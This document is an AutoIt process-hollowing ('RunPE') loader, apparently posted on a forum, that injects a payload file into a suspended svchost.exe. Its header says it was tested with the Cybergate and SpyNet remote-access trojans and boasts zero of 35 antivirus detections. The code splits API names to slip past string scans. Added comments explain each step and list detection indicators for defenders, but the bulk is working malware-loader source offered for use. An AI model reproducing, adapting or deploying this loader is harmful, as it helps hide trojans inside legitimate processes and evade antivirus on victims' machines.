
[AutoIt] RunPe Module by M3


RunExeFromMemory ( Base Function )

Author : M3

Credits : trancexx (trancexx at yahoo dot com) RunExeFromMemory Base

Tested on Cybergate \ SpyNet on WIN_XP , WIN_VISTA , WIN_7_32


;==============================================================================
; RunExeFromMemory ( Base Function )
; Author : M3
; Credits : trancexx (trancexx at yahoo dot com) RunExeFromMemory Base
; Tested on Cybergate \ SpyNet on WIN_XP , WIN_VISTA , WIN_7_32
; Detections : 0 | 35 http://scanner.udtools.net/reporte.php?id=m3py_ubxG
;==============================================================================

#include<WINAPI.au3>
#include <[Includes]\_ThreadContext.au3>



; Script entry: the payload (Server.exe on the current user's desktop) is read as raw bytes
; and handed to RunBinaryInMemory, which never writes it back to disk or starts it by path.
; File-execution telemetry therefore shows only the AutoIt host and a child svchost.exe;
; the read of "\Server.exe" from @DesktopDir is the only on-disk touch of the payload.
RunBinaryInMemory(FileRead(@DesktopDir & "\Server.exe" ) )



;==============================================================================
; RunBinaryInMemory - process hollowing ("RunPE") loader for a 32-bit PE image.
;
; What the code below does, in order:
;   1. Copies $bBinaryImage into a local DllStruct so the PE headers can be
;      walked by pointer.
;   2. Starts @SystemDir\svchost.exe with creation flag 4 (CREATE_SUSPENDED):
;      the process and its primary thread exist but have not executed.
;   3. Reads that thread's register context via ntdll!NtGetContextThread.
;   4. Parses IMAGE_DOS_HEADER / IMAGE_FILE_HEADER / IMAGE_OPTIONAL_HEADER of
;      the supplied image, writes the image's ImageBase into the remote slot at
;      Ebx+8, unmaps the original view, allocates RWX memory, then copies the
;      headers and every section into the remote process at $sValue.
;   5. Sets Eax to $sValue + AddressOfEntryPoint, writes the context back and
;      resumes the thread (helpers from [Includes]\_ThreadContext.au3, not shown).
;
; Parameters:
;   $bBinaryImage - PE image as an AutoIt binary value (caller passes FileRead output).
; Returns: nothing. None of the DllCall / _WinAPI results are checked; @error is
;   never inspected, so every step is attempted regardless of earlier failures.
; Side effects: creates a new svchost.exe process and rewrites its memory and
;   thread context; declares globals $sNTDLL, $sKernel32, $sEbx, $sValue that the
;   helper functions below depend on.
;
; Detection notes (for defenders reading this sample):
;   - The sequence CreateProcess(CREATE_SUSPENDED) -> NtGetContextThread ->
;     NtUnmapViewOfSection -> VirtualAllocEx(PAGE_EXECUTE_READWRITE) ->
;     NtWriteVirtualMemory -> SetThreadContext -> ResumeThread on a just-created
;     svchost.exe is the classic hollowing pattern; thread-context and cross-process
;     memory-write events tie it back to the AutoIt host process.
;   - The resulting svchost.exe is a child of the script's process rather than
;     services.exe, and the PE mapped at its image base no longer matches the
;     file on disk, which image/memory comparison scans will flag.
;   - Several API names in the helpers are assembled by string concatenation
;     ("NtUnmap" & "ViewOfSection"); this only hides them from naive string
;     scans of the script, not from runtime API monitoring.
;==============================================================================
Func RunBinaryInMemory($bBinaryImage)


; Globals used by the helpers further down: the DLLs to call into, the register
; treated as the PEB pointer, and the fixed remote address every header/section
; write and the final entry point are based on.
Global $sNTDLL = "ntdll"

Global $sKernel32 = "kernel32"

Global $sEbx = "Ebx"

Global $sValue = 0x00400000


Local $pPointer , $tSTARTUPINFO , $tPROCESS_INFORMATION ,$hProcess , $hThread , $tCONTEXT , $tIMAGE_DOS_HEADER , $tIMAGE_NT_SIGNATURE , _
$tIMAGE_FILE_HEADER , $iNumberOfSections , $iEntryPointNEW , $pOptionalHeaderImageBaseNEW , $iOptionalHeaderSizeOfImageNEW , $pHEADERS_NEW , _
$tIMAGE_SECTION_HEADER, $sCONTEXT , $iSizeOfRawData, $pPointerToRawData, $iVirtualAddress ,$tInput , $iRunFlag , $CONTEXT_FUL


; A Boolean[] struct sized by the byte length of the image serves as a plain
; byte buffer; $pPointer then walks the PE headers inside it.
$tInput = DllStructCreate("Boolean[" & sReadBytes($bBinaryImage) & "]")

DllStructSetData($tInput, 1, $bBinaryImage)

$pPointer = DllStructGetPtr($tInput)

; STARTUPINFO / PROCESS_INFORMATION for the host process; cbSize is left at 0.
$tSTARTUPINFO = DllStructCreate("dword cbSize;ptr Reserved;ptr Desktop;ptr Title;dword X;dword Y;dword XSize;dword YSize;dword XCountChars;dword YCountChars;dword FillAttribute;dword Flags;ushort ShowWindow;ushort Reserved2;ptr Reserved2;ptr hStdInput;ptr hStdOutput;ptr hStdError")

$tPROCESS_INFORMATION = DllStructCreate("ptr Process;ptr Thread;dword ProcessId;dword ThreadId")

; Creation flag 4 = CREATE_SUSPENDED: svchost.exe is created but its primary
; thread does not run until _ThreadResume at the end of this function.
_WinAPI_CreateProcess(@SystemDir & "\svchost.exe", 0 , 0 , 0 , 0 , 4 , 0 , 0 , DllStructGetPtr($tSTARTUPINFO), DllStructGetPtr($tPROCESS_INFORMATION))

$hProcess = DllStructGetData($tPROCESS_INFORMATION, "Process")

$hThread = DllStructGetData($tPROCESS_INFORMATION, "Thread")

; 32-bit CONTEXT layout (Edi..SegSs plus 512-byte ExtendedRegisters); this
; function only makes sense for an x86 target thread.
$tCONTEXT = DllStructCreate("dword ContextFlags;dword Dr0; dword Dr1; dword Dr2; dword Dr3; dword Dr6; dword Dr7;dword ControlWord; dword StatusWord; dword TagWord; dword ErrorOffset; dword ErrorSelector; dword DataOffset; dword DataSelector; byte RegisterArea[80]; dword Cr0NpxState;dword SegGs; dword SegFs; dword SegEs; dword SegDs;dword Edi; dword Esi; dword Ebx; dword Edx; dword Ecx; dword Eax;dword Ebp; dword Eip; dword SegCs; dword EFlags; dword Esp; dword SegSs;byte ExtendedRegisters[512]")

; $iRunFlag is hard-coded to 1, so only Case 1 (0x10007 = CONTEXT_FULL for x86)
; is reachable; Case 2 and Case 3 are dead code as written.
$iRunFlag = 1

Switch $iRunFlag

Case 1
$CONTEXT_FULL = 0x10007

Case 2
$CONTEXT_FULL = 0x100007

Case 3
$CONTEXT_FULL = 0x80027

EndSwitch

DllStructSetData($tCONTEXT, "ContextFlags", $CONTEXT_FULL)

; Capture the suspended thread's registers; the struct is filled in place.
DllCall($sNTDLL, "int", "NtGetContextThread", "ptr", $hThread, "ptr", DllStructGetPtr($tCONTEXT))

; --- PE header walk over the local copy of the image ---
; DOS header -> e_lfanew -> PE signature (+4) -> file header (+20)
; -> optional header (+96 then +128, i.e. 224 bytes incl. data directories)
; -> first section header.
$tIMAGE_DOS_HEADER = DllStructCreate("char Magic[2];ushort BytesOnLastPage;ushort Pages;ushort Relocations;ushort SizeofHeader;ushort MinimumExtra;ushort MaximumExtra;ushort SS;ushort SP;ushort Checksum;ushort IP;ushort CS;ushort Relocation;ushort Overlay;char Reserved[8];ushort OEMIdentifier;ushort OEMInformation;char Reserved2[20];dword AddressOfNewExeHeader", $pPointer)

$pPointer += DllStructGetData($tIMAGE_DOS_HEADER, "AddressOfNewExeHeader")

$tIMAGE_NT_SIGNATURE = DllStructCreate("dword Signature", $pPointer)

$pPointer += 4

$tIMAGE_FILE_HEADER = DllStructCreate("ushort Machine;ushort NumberOfSections;dword TimeDateStamp;dword PointerToSymbolTable;dword NumberOfSymbols;ushort SizeOfOptionalHeader;ushort Characteristics", $pPointer)

$iNumberOfSections = DllStructGetData($tIMAGE_FILE_HEADER, "NumberOfSections")

$pPointer += 20

; Neither the "MZ"/"PE" signatures nor Machine are validated before the walk;
; any input is treated as a well-formed 32-bit PE.
$tIMAGE_OPTIONAL_HEADER = DllStructCreate("word Magic;byte MajorLinkerVersion;byte MinorLinkerVersion;dword SizeOfCode;dword SizeOfInitializedData;dword SizeOfUninitializedData;dword AddressOfEntryPoint;dword BaseOfCode;dword BaseOfData;dword ImageBase;dword SectionAlignment;dword FileAlignment;word MajorOperatingSystemVersion;word MinorOperatingSystemVersion;word MajorImageVersion;word MinorImageVersion;word MajorSubsystemVersion;word MinorSubsystemVersion;dword Win32VersionValue;dword SizeOfImage;dword SizeOfHeaders;dword CheckSum;word Subsystem;word DllCharacteristics;dword SizeOfStackReserve;dword SizeOfStackCommit;dword SizeOfHeapReserve;dword SizeOfHeapCommit;dword LoaderFlags;dword NumberOfRvaAndSizes" ,$pPointer)

$pPointer += 96

$iEntryPointNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "AddressOfEntryPoint")

$pPointer += 128

$pOptionalHeaderImageBaseNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "ImageBase")

$iOptionalHeaderSizeOfImageNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "SizeOfImage")

; Ebx + 8 is used as the remote address of the image-base slot; for a suspended
; x86 process Ebx is presumably the PEB pointer and +8 its ImageBaseAddress
; field (inferred from the 4-byte write below -- confirm against the target OS).
$sCONTEXT = DllStructGetData($tCONTEXT, $sEbx) + 8

$hBaseAddress = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "ImageBaseAddress")

; Write the supplied image's ImageBase (4 bytes) into that remote slot.
_NtWriteVirtualMemory( $hProcess, $sCONTEXT , $pOptionalHeaderImageBaseNEW, 4, 0)

; Remove the original mapping, then allocate SizeOfImage bytes of RWX memory in
; the remote process (see _VirtualAllocEx for the protection flags).
_sUnmapViewOfSection($hProcess, $hBaseAddress)

_VirtualAllocEx ( $hProcess, $pOptionalHeaderImageBaseNEW, $iOptionalHeaderSizeOfImageNEW)

; Copy the PE headers (SizeOfHeaders bytes from the start of the local buffer)
; to the fixed remote base $sValue.
$pHEADERS_NEW = DllStructGetPtr($tIMAGE_DOS_HEADER)

$iOptionalHeaderSizeOfHeadersNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "SizeOfHeaders")

_ProcessMemoryWrite ( $hProcess, $sValue, $pHEADERS_NEW, $iOptionalHeaderSizeOfHeadersNEW)



; Section copy: for each IMAGE_SECTION_HEADER (40 bytes apart) write
; SizeOfRawData bytes from file offset PointerToRawData to $sValue + VirtualAddress.
; _ProcessMemoryWrite comes from the included _ThreadContext.au3 (not shown here).
For $i = 1 To $iNumberOfSections

$tIMAGE_SECTION_HEADER = DllStructCreate("char Name[8];dword UnionOfVirtualSizeAndPhysicalAddress;dword VirtualAddress;dword SizeOfRawData;dword PointerToRawData;dword PointerToRelocations;dword PointerToLinenumbers;ushort NumberOfRelocations;ushort NumberOfLinenumbers;dword Characteristics", $pPointer)

$iSizeOfRawData = DllStructGetData($tIMAGE_SECTION_HEADER, "SizeOfRawData")

$pPointerToRawData = DllStructGetPtr($tIMAGE_DOS_HEADER) + DllStructGetData($tIMAGE_SECTION_HEADER, "PointerToRawData")

$iVirtualAddress = DllStructGetData($tIMAGE_SECTION_HEADER, "VirtualAddress")

_ProcessMemoryWrite( $hProcess, $sValue + $iVirtualAddress, $pPointerToRawData, $iSizeOfRawData)

$pPointer += 40

Next


; Redirect the suspended thread: Eax is set to the new entry point (for a
; suspended primary thread Eax is presumably the start address the loader
; jumps to -- inferred), the context is written back, and the thread is resumed.
; _ThreadSetContext / _ThreadResume are defined in _ThreadContext.au3 (not shown).
DllStructSetData($tCONTEXT, "Eax", $sValue + $iEntryPointNEW)

_ThreadSetContext ($hThread, $tCONTEXT)

_ThreadResume($hThread)


EndFunc






; Size helper: returns the number of bytes in an AutoIt binary value.
;   $Data - binary (or value BinaryLen can measure)
; Returns the byte count as an integer.
Func sReadBytes($Data)
	Return BinaryLen($Data)
EndFunc




; Wrapper around ntdll!NtUnmapViewOfSection: unmaps the view at $pAddress in the
; process $hProcess. The API name is assembled from two string pieces, which
; hides it from naive string scans of the script only.
;   $hProcess - process handle (from PROCESS_INFORMATION in RunBinaryInMemory)
;   $pAddress - base address of the mapping to remove
; Returns the raw DllCall array (element [0] is the NTSTATUS as an "int");
; @error is not checked. Depends on the global $sNTDLL set in RunBinaryInMemory.
; Cross-process section unmapping on a suspended child is a strong hollowing indicator.
Func _sUnmapViewOfSection($hProcess, $pAddress)

$sRet = DllCall($sNTDLL, "int", "NtUnmap" & "ViewOfSection", "ptr", $hProcess, "ptr", $pAddress)
return $sRet

EndFunc




; Wrapper around kernel32!VirtualAllocEx for a remote process.
;   $hProcess - target process handle
;   $pAddress - requested base address
;   $iSize    - bytes to allocate
; Fixed flags: 0x3000 = MEM_COMMIT | MEM_RESERVE, 64 (0x40) = PAGE_EXECUTE_READWRITE,
; i.e. the region is writable and executable at once. Returns the raw DllCall
; array (element [0] is the returned base pointer); the caller ignores it and
; @error is not checked. Depends on the global $sKernel32 from RunBinaryInMemory.
; RWX allocations made into another process are a high-signal telemetry event.
Func _VirtualAllocEx($hProcess, $pAddress, $iSize)

$aCall = DllCall($sKernel32, "ptr", "Virtual" & "AllocEx", "handle", $hProcess, "ptr", $pAddress, "dword_ptr", $iSize, "dword", 0x3000,"dword", 64)

Return $aCall

EndFunc



; Wrapper around ntdll!NtWriteVirtualMemory.
;   $hProcess               - target process handle (passed as "int")
;   $lpBaseAddress          - remote address to write to
;   $lpBuffer               - passed as "ptr*": DllCall hands the API the address of a
;                             temporary holding this VALUE, so the 4-byte value itself
;                             (the ImageBase in RunBinaryInMemory) is what gets written
;   $nSize                  - bytes to write
;   $lpNumberOfBytesWritten - passed through as an "int" (caller supplies 0)
; Returns the raw DllCall array (element [0] is the NTSTATUS); @error is not checked.
; Depends on the global $sNTDLL set in RunBinaryInMemory. The name is split with
; string concatenation, which does not affect what API-level monitoring sees.
Func _NtWriteVirtualMemory($hProcess, $lpBaseAddress, $lpBuffer, $nSize, $lpNumberOfBytesWritten)

Local $Return

$Return = DllCall($sNTDLL, "int", "NtWrite" & "VirtualMemory", "int", $hProcess, "ptr", $lpBaseAddress, "ptr*", $lpBuffer, "int", $nSize, "int", $lpNumberOfBytesWritten)

Return $Return

EndFunc
